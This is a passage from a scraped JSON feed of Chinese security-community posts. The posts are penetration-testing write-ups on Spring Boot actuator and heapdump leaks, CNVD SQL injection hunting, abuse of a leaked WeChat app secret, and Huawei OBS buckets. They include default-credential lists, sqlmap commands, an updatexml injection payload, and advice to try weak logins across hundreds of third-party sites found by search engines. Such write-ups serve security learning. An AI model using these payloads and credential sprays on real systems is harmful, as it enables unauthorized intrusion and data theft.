ight":1007,"blurhash":"LPRfh2?bM{-;9FR*ofWB00RjozRj"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722846870-417345-image.png","type":"photo","width":1663,"height":944,"blurhash":"LGRV^Jx_%1?byER4o#of4mT1IUoK"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722846888-713956-image.png","type":"photo","width":1521,"height":846,"blurhash":"LDRymPkUS2~qDiRjW;Rk0Ks;ogW?"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-05/1722846901-282581-image.png","type":"photo","width":1220,"height":577,"blurhash":"LmMaCZ%MWBt7~Xt8WBoL?HfkfQj["}],"categories":["原创文章","挖洞姿势","应用安全","实战攻防","xss"],"attachments":null,"extra":null,"language":null},{"title":"红队打点 | 记一次Spring-Boot横向渗透","url":"https://zone.huoxian.cn/d/2924-spring-boot","content":"这篇文章给师傅们分享下,前段时间的一个渗透测试的一个项目,开始也是先通过各种的手段和手法利用一些工具啊包括空间引擎等站点对该目标公司进行一个渗透测试。前面找的突破口很少,不太好搞,但是后面找到了spring全家桶的相关漏洞,然后打了spring的很多漏洞,然后也是交了蛮多的漏洞报告的。
\\n\\n首先对这个公司进行信息收集,公司比较小然后利用爱企查也没有信息可以提供查询的
\\n\\n这里点击这个股份穿透图,这个是免费的不需要会员,
\\n然后如果你要对一个公司进行测试的话,可以利用这些拓扑图然后进行一个边缘资产的收集,进行外围打点之类的操作
下面就找到了改公司的股份公司,然后对改公司再进行一个信息收集和资产收集
\\n可以重点看下改公司的实缴资金以及相关知识产权,里面可以去测下这些web系统的相关漏洞,要是能打一般这样的系统都是一个通杀漏洞了。
我这里使用onefor-all子域名扫描工具进行扫描
\\n\\npython oneforall.py --target https://url/ run
\\n\\n然后访问子域名,再利用一些插件进行信息收集,看看开放的端口什么的
\\n\\n然后找里面的子域名资产利用dirsearch进行目录扫描
\\n\\n后来通过FOFA资产检索,发现了下面这个网站
\\n\\n这里通过检索druid关键字,发现子域名可能存在druid协议,那么就可以尝试打一波druid漏洞
\\n\\n通过拼接druid的登录接口,发现确实存在druid登录后台
\\n\\n然后就可以使用druid的常见弱口令,发现成功可以登录druid后台,然后后面就可以使用druid工具打打nday啥的了
\\n\\n常见用户:admin ruoyi druid\\n常见密码:123456 12345 ruoyi admin druid admin123 admin888
\\n\\n上面既然发现了druid,那么我们就可以使用曾哥的spring-boot工具进行扫一波
\\n可以看到下面泄露了很多的未授权接口目录的信息,且泄露的页面长度很多
python SpringBoot-Scan.py -u ip
\\n\\n下面泄露了很多的接口信息,下面可以进行挨个访问看看
\\n\\n下面是常见的spring-boot接口泄露的相关信息,都可以去尝试访问下
\\n\\n/actuator\\n查看有哪些 Actuator端点是开放的。\\n\\n/actuator/auditevent\\nauditevents端点提供有关应用程序审计事件的信息。\\n\\n/actuator/beans\\nbeans端点提供有关应用程序 bean 的信息。\\n\\n/actuator/conditions\\nconditions端点提供有关配置和自动配置类条件评估的信息。\\n\\n/actuator/configprops\\nconfigprops端点提供有关应用程序@ConfigurationPropertiesbean的信息。\\n\\n/actuator/env \\n查看全部环境属性,可以看到 SpringBoot 载入哪些 properties,以及 properties 的值(会自动用*替换 key、password、secret 等关键字的 properties 的值)。\\n\\n/actuator/flyway\\nflyway端点提供有关 Flyway 执行的数据库迁移的信息。\\n\\n/actuator/health \\n端点提供有关应用程序运行状况的health详细信息。\\n\\n/actuator/heapdump\\nheapdump端点提供来自应用程序 JVM 的堆转储。(通过分析查看/env端点被*号替换到数据的具体值。)\\n\\n/actuator/httptrace\\nhttptrace端点提供有关 HTTP 请求-响应交换的信息。(包括用户HTTP请求的Cookie数据,会造成Cookie泄露等)。\\n\\n/actuator/info\\ninfo端点提供有关应用程序的一般信息。
\\n\\n在/actuator/env直接拿下该账户密码
\\n\\n然后这里直接访问这个下载heapdump文件,然后再使用heapdump工具进行检测里面的敏感信息
\\n\\n使用脚本工具进行分析,里面泄露了很多的信息,可以去里面收集很多的账户密码,然后还有OSS储存桶相关账户信息
\\n\\njava -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
\\n\\n这里我利用这个站点直接看里面的js接口,使用findsomething插件看看有什么常见的api泄露的接口,但是在这个插件中没有找到什么有价值的信息泄露接口
\\n\\n下面可以尝试F12查看该站点的js文件,看看有没有常见的api泄露接口
\\n直接在源代码里面检索文件里面的所有api接口,然后挨个去尝试下
可以看到下面的这个api接口是可以成功访问的,直接一手未授权访问
\\n\\n上面泄露的api接口使用Swagger UI插件访问,可以看到下面右下角是没有加密的,也就是我们可以尝试下面的GET、POST请求方法去打一个api接口未授权
\\n\\n这里我们可以通过bp爆破去遍历一下id用户信息
\\n\\n然后里面还有很多的这样的信息泄露的接口都可以尝试未授权访问,看看有没有什么敏感信息泄露
\\n\\n相关的对该目标公司的站点的渗透测试的细节都分享给师傅们了,然后这次的话主要是针对spring-boot的一次横向渗透,利用红队打点的常见思路,对目标站点进行渗透测试,然后再利用别的接口泄露打一套漏洞,最后也是顺利的完成了这次渗透测试的工作。
\\n希望这篇文章对师傅们有帮助!!!
文章中涉及的敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!
\\n\\n\\n","description":"0x1 前言 这篇文章给师傅们分享下,前段时间的一个渗透测试的一个项目,开始也是先通过各种的手段和手法利用一些工具啊包括空间引擎等站点对该目标公司进行一个渗透测试。前面找的突破口很少,不太好搞,但是后面找到了spring全家桶的相关漏洞,然后打了spring的很多漏洞,然后也是交了蛮多的漏洞报告的。\\n\\n0x2 信息收集+资产收集\\n\\n首先对这个公司进行信息收集,公司比较小然后利用爱企查也没有信息可以提供查询的\\n\\n这里点击这个股份穿透图,这个是免费的不需要会员,\\n 然后如果你要对一个公司进行测试的话,可以利用这些拓扑图然后进行一个边缘资产的收集…","guid":"https://zone.huoxian.cn/d/2924-spring-boot","author":"looklook","authorUrl":null,"authorAvatar":null,"publishedAt":"2024-08-03T05:16:12.142Z","media":[{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723543785-960668-image.png","type":"photo","width":1002,"height":429,"blurhash":"L93]+LQ,VsyEysQ,R4tmWVadR5bc"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723543804-735074-image.png","type":"photo","width":1479,"height":707,"blurhash":"LBRV|Wp1Tf_NM#9xPBNfUvNgO[Nf"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723543819-505070-image.png","type":"photo","width":1281,"height":687,"blurhash":"LCSY,M~q?]?w^iR-TKt7Z~WXIWt7"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723543845-115213-image.png","type":"photo","width":1759,"height":782,"blurhash":"LFS6Pma%TK?wsrIpJCOFIBM}T0OZ"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723543860-691986-image.png","type":"photo","width":1902,"height":920,"blurhash":"L36aPDPT=|xZ1Ir]V[JA+_nOnioL"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723543866-730911-image.png","type":"photo","width":1866,"height":758,"blurhash":"LBSF;M~q^*~qyEjG%0oM4oR*xWWV"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723543879-95729-image.png","type":"photo","width":1109,"height":899,"blurhash":"L9S6Su?vI@~q_NkWjZWC4.WBjFR+"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723543892-342361-image.png","type":"photo","width":1896,"height":766,"blurhash":"L168Ed%3InS$uiPAofsoL#^7x]X8"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723543906-356402-image.png","type":"photo","width":1538,"height":828,"blurhash":"L01pC|I8TJx_t2tnXRNZspyDS4TK"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723543913-286681-image.png","type":"photo","width":1399,"height":770,"blurhash":"LlLgeCx[8{s:n-n$W-bH4TV@-;oL"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723543928-808551-image.png","type":"photo","width":1525,"height":740,"blurhash":"LER{x+_N~W_N%is:xVflEgV@VsM{"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723543946-676189-image.png","type":"photo","width":1312,"height":748,"blurhash":"LgP%O:ozoft74naya}WB00oLWCfk"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723543960-599600-image.png","type":"photo","width":1523,"height":713,"blurhash":"L8SF;L4o4T^+?wbc%L-pE1t7smsl"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723543976-355594-image.png","type":"photo","width":1768,"height":897,"blurhash":"L17A[5?H5PxHHWOYvgM{{KtlKiae"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723543988-913161-image.png","type":"photo","width":1123,"height":710,"blurhash":"LBQck=tRo#-o00WA%NxZ%LRjRkoe"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723543995-535733-image.png","type":"photo","width":1134,"height":824,"blurhash":"LCSr}*%4V{_3_4bFa_j[rvX7kCWV"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723544016-830449-image.png","type":"photo","width":1045,"height":935,"blurhash":"LYRMYss:kD%M4nj]ayWB01f+e.WB"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723544029-515890-image.png","type":"photo","width":1681,"height":306,"blurhash":"LXSPOs~q9F~W%2kCbHj[gNkCaej["},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723544042-421628-image.png","type":"photo","width":1661,"height":824,"blurhash":"L27A;|cEX8%31b#mjES3niJ7WAn%"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723544054-840433-image.png","type":"photo","width":1191,"height":896,"blurhash":"LJRV^MxaRj~qIVtRM{Rj01kCofRj"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723544068-405756-image.png","type":"photo","width":1570,"height":797,"blurhash":"LgO:*6WBt8og9EM{t7RP4mRjtRRj"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723544080-780092-image.png","type":"photo","width":1268,"height":699,"blurhash":"LBT9Cc_3j]~q-VV[j[t7R,jYjsj["},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723544093-762720-image.png","type":"photo","width":1813,"height":821,"blurhash":"LMRyvo-;ae-;VrayfRay0KWBbHWV"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723544104-997412-image.png","type":"photo","width":1634,"height":820,"blurhash":"LnPG,Dt7j@xu_NoffkkCITodayWB"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723544111-306156-image.png","type":"photo","width":1055,"height":690,"blurhash":"L34B%wtSbIs:.Ts;aybb-?juWBf+"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-13/1723544127-27066-image.png","type":"photo","width":1800,"height":795,"blurhash":"LIQmCqRjMx%M}@r=nhslRXfmkDWY"}],"categories":["原创文章","挖洞姿势","应用安全","实战攻防","黑客事件","信息收集"],"attachments":null,"extra":null,"language":null},{"title":"CNVD挖掘|手把手通用型证书+资产收集","url":"https://zone.huoxian.cn/d/2923-cnvd","content":"挖掘CNVD漏洞有时候其实比一般的edusrc还好挖,但是一般要挖证书的话,还是需要花时间的,其中信息收集,公司资产确定等操作需要花费一定时间的。下面就记录下我之前跟一个师傅学习的一个sql注入的CNVD漏洞通杀(仅作为思路分享)。
\\n\\n首先这里我先确定这个公司的资产信息,可以使用网上一些免费的企业查询在线网站,比如爱企查、企查查、风鸟等在线免费的企业信息查询网站。
\\n\\n下面可以看到该公司的基本信息以及重要的注册资本资金,但是现在对于要拿漏洞证书的通用型漏洞来说,需要实缴资本大于5000万,下面这个公司就符合。
\\n\\n像这里面的系统都是可以进行测试的,一般都是可以利用空间搜素引擎进行检索,然后去挨个找漏洞,找到了就可以再去利用搜素引擎进行检索关键字进行模糊匹配,然后打个通杀漏洞,就可以拿到CNVD漏洞证书了。
\\n\\n下面就是利用FOFA进行检索目标网站了,这里利用空间引擎进行检索的时候,很容易打偏,因为资产网站很多,所以检索语法需要进行多测试,对关键字进行模糊匹配
\\n\\n下面直接检索仓库管理系统
\\n\\n这里需要主要的是这里FOFA还给我们整理了icon图标,可以找对应的icon,然后也是同一系统,然后也是可以打一个通杀的
\\n\\n也可以利用FOFA检索出来的系统名称进行一个漏洞测试,测试出来都是一个系统,也是很大概率会碰倒通杀漏洞的,提交CNVD也是可以拿到一个漏洞报送证书的
\\n\\n下面就检索有关Vue相关的icon网站
\\n\\nvue是一个用于创建用户界面的开源JavaScript框架,也是一个创建单页应用的Web应用框架。他的图标长这样,绿色的一个V,如果以后看到这样一个图标,这就是vue框架了:
\\n\\n这里随便点开一个网站,然后进行测试
\\n\\n这里可以看到里面有管理员登录,那么看到账号密码登录框以及管管理员登录,首先就要尝试下弱口令以及尝试下sql万能密码,看看能不能进去。
\\n\\n这里我还是运气蛮好的,直接弱口令admin:admin就直接登录进去了
\\n进去以后,那么就可以尝试在网站后台进行测试其他的漏洞了
后台个人中心的修改密码的地方,师傅们感兴趣的可以测测CSRF、SQL注入、以及水平/垂直越权漏洞
\\n\\n然后在这个学生账号查询框处可以发现测试单引号报了sql注入错误,显示了sql查询语句,说明这里基本上就是存在sql注入漏洞
\\n\\n把bp抓到的数据包保存到sqlmap里面,然后利用sqlmap工具跑,过程可能比较慢
\\n\\n利用sqlmap一把嗦的命令如下:
\\n\\npython sqlmap.py -l 1.txt --batch --random-agent\\npython sqlmap.py -r 1.txt --batch
\\n通过查看下面的sqlmap跑出来的结果可以看到,这个网站存在sql报错注入、sql盲注以及时间盲注,可以通过sqlmap下面的提示的url进行尝试
\\n\\n然后再利用下面的报错盲注测测,利用手工在bp数据包中测试
\\n\\n利用updatexml()函数测出数据库版本、数据库信息即可
\\n\\nupdatexml(1,concat(0x7e,database(),0x7e),3)--+
\\n\\n因为刚才的系统都是我再检索一个公司旗下的系统,所以我们可以尝试下找找这个网站的关键字然后进行模糊匹配,一般常利用JS或者网页源代码里面比较特殊的字符,然后利用空间检索引擎进行检索
\\n\\n
\\n我这里直接右击查看网页源代码,发现这串字符串比较特殊,不出意外的话是可以利用FOFA碰出比较多的相关网站的
We\'re sorry but mas-creator-admin doesn\'t work properly without JavaScript enabled. Please enable it to continue.
\\n这里FOFA匹配出来了很多的icon图标,我们这里直接利用刚才的Vue框架进行测试
\\n\\n匹配出来了318条独立的IP,那么我们是不是可以像开始那样测试,开始先测试下弱口令以及SQL万能密码看看能不能登进去,然后再在登录后台进行测试下sql注入
\\n\\n包括使用鹰图,可以发现检索匹配成功的IP数量更加多,那么接下来我们就可以提交CNVD漏洞了,后面我这里提交了多个事件型CNVD以及通用型CNVD漏洞。
\\n
现在漏洞有了,接下来就是证明它是否为通用型漏洞,CNVD的通用型漏洞要求如下:中危及中危以上的通用性漏洞(CVSS2.0基准评分超过4.0
) 软件开发商注册资金大于等于5000万人民币
或者涉及党政机关、重要行业单位、科研院所、重要企事业单位(如:中央国有大型企业、部委直属事业单位等)的高危事件型漏洞 通用型漏洞得十个网络案例以上。
首先看一看软件开发商注册资金是否大于5000万。接着是需要10个案例
,那么就掏出fofa,再找出10个案例就好,其中我们要写三个案例的word报告提交
。找网站存在相同特征,每个都试一下,一般像这样的通用型web应用基本上都是通杀的。
写好报告后直接提交至CNVD平台,等着下证书就OK了🙂
\\n\\n\\n对于这篇文章的思路主要是对CNVD漏洞通用型证书站的一个思路分享,其中我们在信息收集以及资产收集的时候尤为重要,也是比较难的一步,在进行使用空间检索引擎比如我们常用的FOFA、鹰图等的检索语法要常记,因为容易打偏资产,CNVD在审核的过程中就不会通过。
\\n对于通杀漏洞,CNVD通用型的漏洞来讲我们首先需要确定资产,然后确定该资产的旗下的产品,然后有目标的去资产收集和信息收集等操作,然后去利用FOFA语法去利用关键字模糊匹配,然后确定系统去打一个通杀。
\\n最后,希望这篇文章对师傅们有帮助!!!
文章中涉及的敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!
\\n\\n\\n","description":"0x1 前言 挖掘CNVD漏洞有时候其实比一般的edusrc还好挖,但是一般要挖证书的话,还是需要花时间的,其中信息收集,公司资产确定等操作需要花费一定时间的。下面就记录下我之前跟一个师傅学习的一个sql注入的CNVD漏洞通杀(仅作为思路分享)。\\n\\n0x2 资产收集\\n\\n首先这里我先确定这个公司的资产信息,可以使用网上一些免费的企业查询在线网站,比如爱企查、企查查、风鸟等在线免费的企业信息查询网站。\\n\\n下面可以看到该公司的基本信息以及重要的注册资本资金,但是现在对于要拿漏洞证书的通用型漏洞来说,需要实缴资本大于5000万,下面这个公司就符合。…","guid":"https://zone.huoxian.cn/d/2923-cnvd","author":"looklook","authorUrl":null,"authorAvatar":null,"publishedAt":"2024-08-01T06:47:45.393Z","media":[{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722493990-857675-image.png","type":"photo","width":1072,"height":614,"blurhash":"LUBf^MRj4o-;t7ofRkay01t7?aIU"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494029-497270-image.png","type":"photo","width":1523,"height":636,"blurhash":"LERfh5xIpJ?wjKE2T1T0Z$IVb_OZ"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494037-361809-image.png","type":"photo","width":1527,"height":674,"blurhash":"LCRyvrx^5T_N$lD+N{KPIBIVT1K6"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494055-419543-image.png","type":"photo","width":1524,"height":658,"blurhash":"LER{uwyET1?wn.IWOZOZD*M|S%T0"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494070-64656-image.png","type":"photo","width":1160,"height":119,"blurhash":"LF8p+Vt7ofae%2j]j[f60dRjWBkC"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494083-58377-image.png","type":"photo","width":1724,"height":492,"blurhash":"L23]7YreRNgM%MaLJ-bdHrNFIpov"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494094-517710-image.png","type":"photo","width":1710,"height":682,"blurhash":"L01M.$-q$7y?M]Q8VCpvcrr]rqu4"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494107-588629-image.png","type":"photo","width":1315,"height":392,"blurhash":"L12$aIt8MxI;_NxbInRP?wR*WXWo"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494119-223096-image.png","type":"photo","width":878,"height":439,"blurhash":"LR6dd9kCa2kChaf*kCf*kofjbtfj"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494221-717069-image.png","type":"photo","width":1279,"height":817,"blurhash":"LURC_Lxvo}%M19WCV@a#0=bIWAWW"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494237-766802-image.png","type":"photo","width":1920,"height":809,"blurhash":"LeP%n$xvofxu0qa#j]a#5GWCWBa#"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494254-628853-image.png","type":"photo","width":1477,"height":723,"blurhash":"L,L}T[4mE0%MI^xYs.R,9bjDoIWY"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494361-695090-image.png","type":"photo","width":1920,"height":824,"blurhash":"LEQvqB_4t-?Hu6n$ROkC5ZV?R4kW"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494376-368045-image.png","type":"photo","width":1112,"height":723,"blurhash":"L6RC-[I99F_34WROtRxu00%fShS2"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494391-58159-image.png","type":"photo","width":1102,"height":708,"blurhash":"L16*O8.89@-p2?=|+vNGZ#O?Osi_"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494398-852238-image.png","type":"photo","width":1171,"height":702,"blurhash":"L16tzY?c9toz1a%3#mM{+vXnTKs9"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494413-849642-image.png","type":"photo","width":1330,"height":696,"blurhash":"L17dnIX-Nt%NLzrXIUS$R%K%M_ni"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494434-621046-image.png","type":"photo","width":1529,"height":624,"blurhash":"LMR{*{~XbYx]xIWAflj]j1M_t8oM"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494443-531912-image.png","type":"photo","width":1534,"height":572,"blurhash":"LLS6Ss~XI.%MwiNYs=a#WFR%t8af"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494463-146749-image.png","type":"photo","width":1916,"height":747,"blurhash":"L02i2]s:fQs:^Qj[fQj[=|j[fQj["},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494477-685856-image.png","type":"photo","width":1155,"height":155,"blurhash":"L87KYxoMjsf6%Njtf6j[0Jaya#kC"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494488-806671-image.png","type":"photo","width":1713,"height":247,"blurhash":"L43+QCIVtSx]xvRkkCof4m%LRPM_"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494504-647486-image.png","type":"photo","width":1920,"height":819,"blurhash":"L01fxjNMmk.m+=DhR4xr=}JClAwJ"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494512-931878-image.png","type":"photo","width":1909,"height":806,"blurhash":"L01Mm8H]e9*J^lE2V@%1=_IUX8$%"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-08-01/1722494527-928007-image.png","type":"photo","width":1920,"height":827,"blurhash":"L9SPX|_4M{_3?wRhV?bED*NGS1WB"}],"categories":["原创文章","挖洞姿势","应用安全","实战攻防","信息收集"],"attachments":null,"extra":null,"language":null},{"title":"实战内测-某内测项目微信小程序漏洞挖掘","url":"https://zone.huoxian.cn/d/2922","content":"最近参加了一个内测项目,web应用完全找不到什么漏洞,刚好直接目标定位到了该厂商二开的公众号以及小程序小程序中获取到了突破点,顺便分享一下,小程序的解包以及漏洞挖掘。
\\n\\nNodejs\\nunpackMiniApp\\nunveilr
\\n\\n微信开发者工具
\\n\\n\\n\\n
找到微信文件存储位置Applet下,打开小程序时生成后缀为.wxapkg
的文件
工具unpackMiniApp
解包
工具unveilr
反编译
文件夹wxpack下成功反编译小程序后的文件
\\n\\n根据小程序的解包对文件进行分析,发现在某js文件中存在微信公众号的appid和secert
\\n\\n利用api调用工具进行利用,获取到了accesstoken
\\n\\n工具下载地址
\\n\\n\\n\\n
但是对于公众号的Appid的Appsecert的利用需要注意的两点
\\n\\n下图为用户的接口权限,(该接口权限为我自己公众号说明使用)
\\n\\n但是在这个项目中,比较好奇的是,这个公众号的access_token可直接获取,并未报错ip不再白名单,如ip不在白名单,报错如下
\\n\\n接口请求说明
\\n\\nhttps请求方式: GET
\\n\\n\\n\\n
获取到access_token,测试其它接口
\\n\\n获取到客服账户列表,修改客服账号
\\n\\n成功修改
\\n\\n查询接口分组
\\n\\n结束收工。
\\n\\n小程序进行解包时尽可能所有的功能都访问一下,但是解包本身和小程序直接抓包存在区别
\\n\\n关于小程序和微信公众号的AppID和Secert的利用需要注意几点
\\n\\n类似的密钥泄露风险利用同样比较难利用的有几个
\\n\\n这些类型的泄露风险等级在利用上利用难度不大的情况下,最终研判审核的风险等级相对来说较低。
","description":"前言 最近参加了一个内测项目,web应用完全找不到什么漏洞,刚好直接目标定位到了该厂商二开的公众号以及小程序小程序中获取到了突破点,顺便分享一下,小程序的解包以及漏洞挖掘。\\n\\n工具\\nNodejs\\nunpackMiniApp\\nunveilr\\n\\n微信开发者工具\\n\\nhttps://mp.weixin.qq.com/debug?token=190488442&lang=zh_CN\\n\\n解包\\n\\n找到微信文件存储位置Applet下,打开小程序时生成后缀为.wxapkg的文件\\n\\n工具unpackMiniApp解包\\n\\n工具unveilr反编译\\n\\n文件夹wx…","guid":"https://zone.huoxian.cn/d/2922","author":"Betta","authorUrl":null,"authorAvatar":null,"publishedAt":"2024-07-24T11:26:01.757Z","media":[{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-24/1721814129-824971-image.png","type":"photo","width":837,"height":175,"blurhash":"LCSF*5.Swd?b~qs;kCRjK4rXgNRP"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-24/1721814148-632984-image.png","type":"photo","width":762,"height":331,"blurhash":"LAQ,L0%fM{_20JtQxut6~q%LkBRi"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-24/1721818117-683557-image.png","type":"photo","width":1197,"height":135,"blurhash":"L44_%%?]_2_3%3sWn,s:s;n,n,oL"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-24/1721820143-591948-image.png","type":"photo","width":830,"height":180,"blurhash":"L9R{#?_3t6_2_3IVNGIU~qIoNGIo"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-24/1721820156-654373-image.png","type":"photo","width":927,"height":342,"blurhash":"LLSs4~t5%M~q?boeRjWCkCkCa}WA"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-24/1721820177-459776-image.png","type":"photo","width":1230,"height":744,"blurhash":"LBS?47_3o}_N_3jZoLjtkqe.jFWB"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-24/1721820213-180691-image.png","type":"photo","width":1191,"height":682,"blurhash":"L6Ryyw.9Dk_4MxWBaye:Qon#WSob"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-24/1721820230-420879-image.png","type":"photo","width":1170,"height":557,"blurhash":"LAS?DW~q-:?v_3fkWCofRkWBWBj["},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-24/1721820250-261747-image.png","type":"photo","width":1191,"height":295,"blurhash":"LASF^c~WbH~q9%${ofj^Ix$|j]WE"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-24/1721820269-932435-image.png","type":"photo","width":1196,"height":706,"blurhash":"LBRyvnx]nU~XsEnlM{S0Die-WTbX"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-24/1721820285-756578-image.png","type":"photo","width":1187,"height":376,"blurhash":"LCRpF0^-M|-:DkE1ofs:9Exrt6NG"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-24/1721820305-786384-image.png","type":"photo","width":1094,"height":525,"blurhash":"LDR:HF?d%O-;M+E1M{oN9ZVsV?og"},{"url":"https://huoxian-community.oss-cn-beijing.aliyuncs.com/2024-07-24/1721820329-229606-image.png","type":"photo","width":1124,"height":719,"blurhash":"LAR:KO%Nnn~X4nRQNFNFD%oct6oc"}],"categories":["原创文章","挖洞姿势","应用安全","实战攻防"],"attachments":null,"extra":null,"language":null},{"title":"可“用”性最多的攻防之华为云OBS","url":"https://zone.huoxian.cn/d/2920-obs","content":"云厂商对象存储看了好多家了,上一篇文章介绍了天翼云对象存储ZOS,除了利用工具的可玩性,操作性来讲同前面几篇文章提到的对象存储差别不大,最近看了华为云的OBS,发现华为云在攻击利用的思路上相对来说较其它厂商还是有去别的,因为在配置存储对象的时候可操作性太大了。
\\n\\nOBS(Object Storage Service)是一种云存储服务,提供海量、安全、高可靠、低成本的数据存储能力。OBS支持HTTP/HTTPS协议的Web服务接口和SDK/API接口,用户可以方便地通过网页控制台或各种OBS工具管理和访问存储在OBS上的数据。
\\n\\n华为云的OBS的资源管理工具和天翼云类似,可用性和可操作性还是比较高的。
\\n\\n目前华为云存储无试用,OBS按照资源包计费
\\n\\n各厂商的计费价格基本上出入不大
\\n\\n上传文件
\\n\\n高级配置中可添加元数据字段
\\n\\n华为云的Bucket也是可以进行爆破的,不通状态下的返回包的数据长度不一致,爆破频率可很根据不同厂商的防护情况而定,一般意义不大
\\n\\n其命名规则为<BucketName>.obs.<Region>.myhuaweicloud.com
选择私有配置时
\\n\\n桶内文件无法被直接遍历。当配置桶为公有状态,桶内文件即可被下载。
\\n\\n重新上传txt文件,配置桶策略UserAgent=hwobs
即可访问
